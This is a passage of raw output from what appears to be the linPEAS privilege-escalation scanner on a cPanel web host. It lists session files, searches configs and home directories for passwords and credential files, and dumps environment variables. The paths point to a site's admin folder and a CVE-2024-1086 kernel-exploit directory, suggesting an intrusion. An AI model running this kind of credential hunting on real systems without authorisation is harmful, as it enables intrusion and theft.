webapps1 webapps1 7666191 Dec 21 18:55 /tmp/sortPh10ER -rw------- 1 webapps1 webapps1 34 Dec 12 09:57 /tmp/ci_session266825afbf7c2c17c9949288c8f0b16ef1a4358e -rw------- 1 webapps1 webapps1 7440104 Dec 21 19:02 /tmp/sortmH3A5c -rw------- 1 webapps1 webapps1 7426397 Dec 21 19:04 /tmp/sortVLo0ph -rw------- 1 webapps1 webapps1 7368340 Dec 21 19:05 /tmp/sortsPFzfV -rw------- 1 webapps1 webapps1 34 Dec 10 04:39 /tmp/ci_session12314f0cc27bc6c3ed78850e7e735c1623077462 -rw------- 1 webapps1 webapps1 34 Dec 23 18:08 /tmp/ci_sessione22llarc255n4g1sdmf8k6vn15m00tbu -rw------- 1 webapps1 webapps1 34 Dec 12 09:57 /tmp/ci_sessione0de568fdb36adbc77e5cf2f78200335567927e7 -rw------- 1 webapps1 webapps1 34 Dec 12 09:57 /tmp/ci_session0931c7f7ae937e0e8789055de83626b4ecd90ed1 -rw------- 1 webapps1 webapps1 34 Dec 12 09:58 /tmp/ci_session7cb519d7a748aaad43739f5fdf0d8a5b743ad33a -rw------- 1 webapps1 webapps1 7425499 Dec 21 19:04 /tmp/sortgVHHSr -rw------- 1 webapps1 webapps1 59 Dec 23 01:54 /tmp/ci_smarthospital8sf60lp157k44tvt057gse18qo7eb4dn -rw------- 1 webapps1 webapps1 7366582 Dec 21 19:03 /tmp/sortNWsdzV -rw------- 1 webapps1 webapps1 7539863 Dec 21 18:49 /tmp/sorttGiEKB -rw------- 1 webapps1 webapps1 7820055 Dec 21 18:58 /tmp/sort3Uk1dN -rw------- 1 webapps1 webapps1 34 Dec 13 16:26 /tmp/ci_sessione5a9b0e37f87ef3bce2bca0ce92bf419d2537e17 -rw------- 1 webapps1 webapps1 34 Dec 23 05:35 /tmp/ci_sessionomnrvl0vha0239kbi7me25r3jo9j62q4 -rw------- 1 webapps1 webapps1 7694619 Dec 21 19:00 /tmp/sortWcz59a -rw------- 1 webapps1 webapps1 34 Dec 22 16:15 /tmp/ci_session9rdqjjck0euucujgqf9i1c3mhk7iml45 -rw------- 1 webapps1 webapps1 7375468 Dec 21 19:01 /tmp/sorthI53O8 -rw------- 1 webapps1 webapps1 34 Dec 9 10:08 /tmp/ci_sessione650aaba3142e5201ed4819ffbfd735e6ade8258 -rw------- 1 webapps1 webapps1 34 Dec 12 04:47 /tmp/ci_sessione8087928f02ef48aa2f4206b290abacd5de241a1 -rw------- 1 webapps1 webapps1 34 Dec 23 14:30 /tmp/ci_session0ec7dfq7l16e1290vqcdp81fedoqlqq4 -rw------- 1 webapps1 webapps1 34 Dec 23 18:08 /tmp/ci_sessionv776u0pkh45rq7uqi7u35f7s8tunkb2o -rw------- 1 webapps1 webapps1 34 Dec 23 18:08 /tmp/ci_sessionhuvi78kve48mb2vghsbhj7q4cp4dojj7 -rw------- 1 webapps1 webapps1 34 Dec 1 21:53 /tmp/ci_smarthospital5hcpap52ksrha1kq67053l6ktqdtu4qg -rw------- 1 webapps1 webapps1 34 Dec 3 16:30 /tmp/ci_smarthospitalcl027p0ddt7njv2vu79nuu0gb13jh6ri -rw------- 1 webapps1 webapps1 8575449 Dec 21 19:00 /tmp/sort5xv9rf -rw------- 1 webapps1 webapps1 34 Dec 12 15:39 /tmp/ci_session802018896fa335c78a580d9d3fd601ecfc841784 -rw------- 1 webapps1 webapps1 7392530 Dec 21 19:04 /tmp/sort04BGH7 -rw------- 1 webapps1 webapps1 59 Dec 18 12:01 /tmp/ci_smarthospitalktr33k6g2bd6ngel1j9lf1oj9dbdbc3f ╔══════════╣ Searching passwords in history files Binary file /opt/alt/python37/lib64/python3.7/idlelib/idle_test/__pycache__/test_history.cpython-37.opt-1.pyc matches Binary file /opt/alt/python37/lib64/python3.7/idlelib/idle_test/__pycache__/test_history.cpython-37.opt-2.pyc matches Binary file /opt/alt/python37/lib64/python3.7/idlelib/idle_test/__pycache__/test_history.cpython-37.pyc matches /opt/alt/python37/lib64/python3.7/idlelib/idle_test/test_history.py: @classmethod /opt/alt/python37/lib64/python3.7/idlelib/idle_test/test_history.py: @classmethod /opt/alt/python37/lib64/python3.7/idlelib/idle_test/test_history.py: cls.root = tk.Tk() /opt/alt/python37/lib64/python3.7/idlelib/idle_test/test_history.py: cls.root.withdraw() /opt/alt/python37/lib64/python3.7/idlelib/idle_test/test_history.py: self.text = text = TextWrapper(self.root) /opt/alt/python37/lib64/python3.7/idlelib/idle_test/test_history.py: @classmethod /opt/alt/python37/lib64/python3.7/idlelib/idle_test/test_history.py: cls.root.destroy() /opt/alt/python37/lib64/python3.7/idlelib/idle_test/test_history.py: del cls.root ╔══════════╣ Searching passwords in config PHP files /var/softaculous/4images/config.php:$db_password = "[[softdbpass]]"; /var/softaculous/abante/config.php: 'password' => '****super-secret-password****', /var/softaculous/abante/config.php:const DB_PASSWORD = '[[softdbpass]]'; /var/softaculous/ajaxchat/config.php:define('AJAX_CHAT_USER', 1); /var/softaculous/alegro/config.php:define('DB_PASSWORD', '[[softdbpass]]'); /var/softaculous/alegro/config.php:define('DB_USER', '[[softdbuser]]'); /var/softaculous/anchor/db.php: 'password' => '[[softdbpass]]', /var/softaculous/arastta/config.php:define('DB_DATABASE', '[[softdb]]'); /var/softaculous/arastta/config.php:define('DB_PASSWORD', '[[softdbpass]]'); /var/softaculous/arastta/config.php:define('DB_USERNAME', '[[softdbuser]]'); /var/softaculous/atutor/config.inc.php:define('DB_PASSWORD', '[[softdbpass]]'); /var/softaculous/atutor/config.inc.php:define('DB_USER', '[[softdbuser]]'); /var/softaculous/atutor/config.inc.php:define('MAIL_SMTP_PASSWORD', ''); /var/softaculous/atutor/config.inc.php:define('MAIL_SMTP_USER', ''); /var/softaculous/avactis/config.php:DB_PASSWORD = "[[softdbpass]]" /var/softaculous/backdrop/settings.php: 'password' => '[[softdbpass]]', /var/softaculous/baker/config.php:define('DB_PASSWORD', '[[softdbpass]]'); /var/softaculous/baker/config.php:define('DB_USERNAME', '[[softdbuser]]'); /var/softaculous/bugs/config.app.php: 'password' => '' /var/softaculous/bugs/config.app.php: 'password' => '[[softdbpass]]', /var/softaculous/burden/config.php:define('DB_PASSWORD', '[[softdbpass]]'); /var/softaculous/burden/config.php:define('DB_USER', '[[softdbuser]]'); /var/softaculous/carbon/config.php:define('DBPassword', '[[softdbpass]]'); /var/softaculous/carbon/config.php:define('DBUser', '[[softdbuser]]'); /var/softaculous/cftp/sys.config.php:define('DB_PASSWORD', '[[softdbpass]]'); /var/softaculous/cftp/sys.config.php:define('DB_USER', '[[softdbuser]]'); /var/softaculous/chamilo/configuration.php: 'show_password_field' => false, /var/softaculous/chamilo/configuration.php: 'show_password_field' => true, /var/softaculous/chamilo/configuration.php: 'force_different_password' => false, /var/softaculous/chamilo/configuration.php:$_configuration['auth_password_links'] = [ /var/softaculous/chamilo/configuration.php:$_configuration['db_password'] = '[[softdbpass]]'; /var/softaculous/chamilo/configuration.php:$_configuration['password_encryption'] = 'sha1'; /var/softaculous/chamilo/configuration.php:/*$_configuration['password_requirements'] = [ /var/softaculous/chamilo/configuration.php://$_configuration['email_template_subscription_to_session_confirmation_lost_password'] = false; /var/softaculous/chamilo/configuration.php://$_configuration['force_renew_password_at_first_login'] = true; /var/softaculous/chamilo/configuration.php://$_configuration['ldap_admin_password_salt'] = 'salt'; /var/softaculous/chamilo/configuration.php://$_configuration['ldap_encrypt_admin_password'] = false; /var/softaculous/chamilo/configuration.php://$_configuration['password_conversion'] = false; /var/softaculous/chamilo/configuration.php://$_configuration['security_password_rotate_days'] = 90; /var/softaculous/chyrp/config.yaml.php: password: "[[softdbpass]]" /var/softaculous/clientexec/config.php: $dbpass = '[[softdbpass]]'; /var/softaculous/clientexec/config.php: $dbuser = '[[softdbuser]]'; /var/softaculous/clipper/config.inc.php:$database_password = '[[softdbpass]]'; /var/softaculous/cmsimple/config.php:$cf['security']['password']="[[admin_pass]]"; /var/softaculous/cmssimple/config.php:$config['db_password'] = '[[softdbpass]]'; /var/softaculous/commentics/config.php:define('CMTX_DB_DATABASE', '[[softdb]]'); /var/softaculous/commentics/config.php:define('CMTX_DB_PASSWORD', '[[softdbpass]]'); /var/softaculous/commentics/config.php:define('CMTX_DB_USERNAME', '[[softdbuser]]'); /var/softaculous/conc/database.php: 'password' => '[[softdbpass]]', /var/softaculous/conc8/database.php: 'password' => '[[softdbpass]]', /var/softaculous/conc85/database.php: 'password' => '[[softdbpass]]', /var/softaculous/cotonti/config.php:$cfg['mysqlpassword'] = '[[softdbpass]]'; // Database password /var/softaculous/cpg/config.inc.php:$CONFIG['dbpass'] = '[[softdbpass]]'; // Your database password /var/softaculous/cpg/config.inc.php:$CONFIG['dbuser'] = '[[softdbuser]]'; // Your database username /var/softaculous/crafty/config.php: $password = '[[softdbpass]]'; /var/softaculous/cszcms/config.inc.php:define('DB_USERNAME', '[[softdbuser]]'); /var/softaculous/cumulus/config.php:define ('DB_USER', '[[softdbuser]]'); /var/softaculous/cumulus/config.php:define ('FTP_USER', ''); /var/softaculous/domainmod/config.inc.php:$dbpassword = '[[softdbpass]]'; /var/softaculous/domainmod/config.inc.php:$dbusername = '[[softdbuser]]'; /var/softaculous/dotcl/config.php:define('DC_DBPASSWORD','[[softdbpass]]'); /var/softaculous/dotcl/config.php:define('DC_DBUSER','[[softdbuser]]'); /var/softaculous/dotproj/config.php:$dPconfig['dbpass'] = '[[softdbpass]]'; /var/softaculous/dotproj/config.php:$dPconfig['dbuser'] = '[[softdbuser]]'; ╔══════════╣ Searching *password* or *credential* files in home (limit 70) /etc/pam.d/password-auth /etc/trusted-key.key /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/lib/config/clear-credentials-by-uri.js /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/lib/config/get-credentials-by-uri.js /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/lib/config/set-credentials-by-uri.js /opt/alt/alt-nodejs12/root/usr/lib/node_modules/npm/lib/config/clear-credentials-by-uri.js /opt/alt/alt-nodejs12/root/usr/lib/node_modules/npm/lib/config/get-credentials-by-uri.js /opt/alt/alt-nodejs12/root/usr/lib/node_modules/npm/lib/config/set-credentials-by-uri.js /opt/alt/alt-nodejs14/root/usr/lib/node_modules/npm/lib/config/clear-credentials-by-uri.js /opt/alt/alt-nodejs14/root/usr/lib/node_modules/npm/lib/config/get-credentials-by-uri.js /opt/alt/alt-nodejs14/root/usr/lib/node_modules/npm/lib/config/set-credentials-by-uri.js /opt/alt/openldap11/share/doc/alt-openldap11-devel/drafts/draft-behera-ldap-password-policy-xx.txt /opt/alt/openssl11/share/man/html/man3/pem_password_cb.html /opt/alt/php56/usr/include/php/ext/standard/php_password.h /opt/alt/php56/usr/share/xcache_3/cacher/mkpassword.php /opt/alt/php70/usr/include/php/ext/standard/php_password.h /opt/alt/php71/usr/include/php/ext/standard/php_password.h /opt/alt/php72/usr/include/php/ext/standard/php_password.h /opt/alt/php73/usr/include/php/ext/standard/php_password.h /opt/alt/php74/usr/include/php/ext/standard/php_password.h /opt/alt/php80/usr/include/php/ext/standard/php_password.h /opt/alt/php81/usr/include/php/ext/standard/php_password.h /opt/alt/php82/usr/include/php/ext/standard/php_password.h /opt/cpanel/ea-openssl/etc/pki/tls/man/man3/des_read_2passwords.3 /opt/cpanel/ea-openssl/etc/pki/tls/man/man3/des_read_password.3 /opt/cpanel/ea-openssl11/share/doc/openssl/html/man3/pem_password_cb.html /opt/cpanel/ea-openssl11/share/man/man3/pem_password_cb.3 /opt/cpanel/ea-php56/root/usr/include/php/ext/standard/php_password.h /opt/cpanel/ea-php70/root/usr/include/php/ext/standard/php_password.h /opt/cpanel/ea-php71/root/usr/include/php/ext/standard/php_password.h /opt/cpanel/ea-php72/root/usr/include/php/ext/standard/php_password.h /opt/cpanel/ea-php73/root/usr/include/php/ext/standard/php_password.h /opt/cpanel/ea-php74/root/usr/include/php/ext/standard/php_password.h /opt/cpanel/ea-php80/root/usr/include/php/ext/standard/php_password.h /opt/cpanel/ea-php81/root/usr/include/php/ext/standard/php_password.h /opt/cpanel/ea-php82/root/usr/include/php/ext/standard/php_password.h /opt/cpanel/ea-php83/root/usr/include/php/ext/standard/php_password.h /opt/cpanel/ea-php84/root/usr/include/php/ext/standard/password_arginfo.h /opt/cpanel/ea-php84/root/usr/include/php/ext/standard/php_password.h /opt/cpanel/ea-ruby27/root/usr/share/gems/doc/rack-2.2.20/ri/Rack/Auth/Basic/Request/credentials-i.ri /opt/cpanel/ea-ruby27/root/usr/share/gems/doc/rack-2.2.20/ri/Rack/Auth/Digest/MD5/passwords_hashed%3f-i.ri /opt/cpanel/ea-ruby27/root/usr/share/gems/doc/rack-2.2.20/ri/Rack/Auth/Digest/MD5/passwords_hashed-i.ri /opt/cpanel/ea-ruby27/root/usr/share/ruby/ruby-2.7.8/bundler/uri_credentials_filter.rb /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.2A4yZYP/full_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.2A4yZYP/read_only_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.3cOd2kj/full_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.3cOd2kj/read_only_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.57mhPcw/full_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.57mhPcw/read_only_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.BxWxgpP/full_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.BxWxgpP/read_only_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.FvCdtqA/full_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.FvCdtqA/read_only_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.NPmgRSL/full_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.NPmgRSL/read_only_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.Ubm6VDw/full_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.Ubm6VDw/read_only_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.ZwfLWDm/full_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.ZwfLWDm/read_only_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.awduraR/full_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.awduraR/read_only_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.cr5E1r6/full_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.cr5E1r6/read_only_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.gzeeFL6/full_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.gzeeFL6/read_only_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.jDM9g4n/full_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.jDM9g4n/read_only_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.lw6FbfH/full_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.lw6FbfH/read_only_admin_password.txt /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.mS7fl2t/full_admin_password.txt ╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs  ╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs  ╔══════════╣ Searching passwords inside logs (limit 70)  ╔══════════╣ Checking all env variables in /proc/*/environ removing duplicates and filtering out useless env vars  *) *v*) *v*x*) *x*) /usr/bin/scl "$@"; ;; IFS=$_mlIFS; IFS=' '; MODULES_USE_COMPAT_VERSION=1; _mlIFS=$IFS; _mlre="${_mlre:-}${_mlv}='`eval 'echo ${'$_mlrv':-}'`' "; _mlre="${_mlre:-}${_mlv}_modquar='`eval 'echo ${'$_mlv'}'`' "; _mlrv="MODULES_RUNENV_${_mlv}"; _mlshdbg='' _mlshdbg='v' _mlshdbg='vx' _mlshdbg='x' _mlstatus=$?; case "$-" in do done; echo "Cannot switch to Modules $swname version, command not found"; echo "Switching to Modules $swname version"; else esac; eval "module $@"; eval ${which_declare} ) | /usr/bin/which --tty-only --read-alias --read-functions --show-tilde --show-dot $@ eval `/usr/bin/tclsh /usr/share/Modules/libexec/modulecmd.tcl bash "$@"`; eval `eval ${_mlre} /usr/bin/tclsh /usr/share/Modules/libexec/modulecmd.tcl bash '"$@"'`; export MODULES_USE_COMPAT_VERSION; fi fi; for _mlv in ${MODULES_RUN_QUARANTINE:-}; if [ "${MODULES_SILENT_SHELL_DEBUG:-0}" = '1' ]; then if [ "${MODULES_USE_COMPAT_VERSION:-0}" = '1' ]; then if [ "${_mlv}" = "${_mlv##*[!A-Za-z0-9_]}" -a "${_mlv}" = "${_mlv#[0-9]}" ]; then if [ $swfound -eq 0 ]; then if [ -e /usr/share/Modules/libexec/modulecmd-compat ]; then if [ -e /usr/share/Modules/libexec/modulecmd.tcl ]; then if [ -n "${IFS+x}" ]; then if [ -n "${_mlIFS+x}" ]; then if [ -n "${_mlre:-}" ]; then if [ -n "${_mlshdbg:-}" ]; then if [ -n "`eval 'echo ${'$_mlv'+x}'`" ]; then return $_mlstatus return 1; set +v; set +vx; set +x; set -$_mlshdbg; source /usr/share/Modules/init/bash; typeset swfound=0; typeset swname='compatibility'; typeset swname='main'; unset IFS; unset MODULES_USE_COMPAT_VERSION; unset _mlre _mlIFS; unset _mlre _mlv _mlrv _mlIFS; unset _mlshdbg; BASH_FUNC__module_raw%%=() { unset _mlshdbg; BASH_FUNC_ml%%=() { module ml "$@" BASH_FUNC_module%%=() { _module_raw "$@" 2>&1 BASH_FUNC_scl%%=() { if [ "$1" = "load" -o "$1" = "unload" ]; then BASH_FUNC_switchml%%=() { typeset swfound=1; BASH_FUNC_which%%=() { ( alias; COLORTERM=truecolor HISTTIMEFORMAT=%F %T LC_CTYPE=C.UTF-8 LESSOPEN=||/usr/bin/lesspipe.sh %s LOADEDMODULES= MANPATH=/usr/share/man: MODULEPATH=/etc/scl/modulefiles:/usr/share/Modules/modulefiles:/etc/modulefiles:/usr/share/modulefiles MODULEPATH_modshare=/usr/share/Modules/modulefiles:2:/etc/modulefiles:2:/usr/share/modulefiles:2 MODULESHOME=/usr/share/Modules MODULES_CMD=/usr/share/Modules/libexec/modulecmd.tcl MODULES_RUN_QUARANTINE=LD_LIBRARY_PATH LD_PRELOAD OLDPWD=/home2/webapps1/amc.ishaneowep.com/admin/logo OLDPWD=/home2/webapps1/amc.ishaneowep.com/admin/logo/CVE-2024-1086 PWD=/home2/webapps1/amc.ishaneowep.com/admin/logo PWD=/tmp SHLVL=1 SHLVL=2 SHLVL=3 SHLVL=4 S_COLORS=auto TERM=xterm-256color TERM_PROGRAM=sshx _=./sshx _=/bin/bash _=/bin/cat _=/bin/dd _=/bin/du _=/bin/grep _=/bin/ping _=/bin/python3 _=/bin/sed _=/bin/sh _=/bin/sort _=/bin/tee _=/bin/tr _=/bin/wget _=/home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/clear _=/home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/python3 which_declare=declare -f }  ╔════════════════╗ ════════════════════════════════╣ API Keys Regex ╠════════════════════════════════  ╚════════════════╝ Regexes to search for API keys aren't activated, use param '-r'